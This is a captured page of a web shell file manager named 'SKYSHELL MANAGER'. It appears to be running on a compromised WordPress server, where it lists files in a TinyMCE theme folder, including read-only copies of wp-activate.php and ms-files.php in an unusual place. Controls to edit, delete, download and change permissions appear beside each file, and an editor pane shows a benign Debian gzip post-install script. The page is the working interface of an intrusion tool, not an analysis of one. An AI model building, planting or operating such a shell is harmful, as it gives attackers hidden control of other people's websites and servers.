📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: gzip.postinst
#!/bin/sh set -e # begin-remove-after: released:forky if [ "$1" = configure ]; then for tool in zcat zcmp zdiff zegrep zfgrep zgrep; do if [ "$(dpkg-divert --truename "/usr/bin/$tool")" = "/usr/bin/$tool.usr-is-merged" ] && [ "$(dpkg-divert --listpackage "/usr/bin/$tool")" = zutils ]; then # This diversion was added by preinst and. This # indicates that zutils was unpacked at preinst time # and is now removed. Thus we clean up the diversion. echo "Removing duplicated diversion of /bin/$tool after zutils is removed." dpkg-divert --rename --package zutils \ --divert "/usr/bin/$tool.usr-is-merged" \ --remove "/usr/bin/$tool" fi done fi # end-remove-after
Save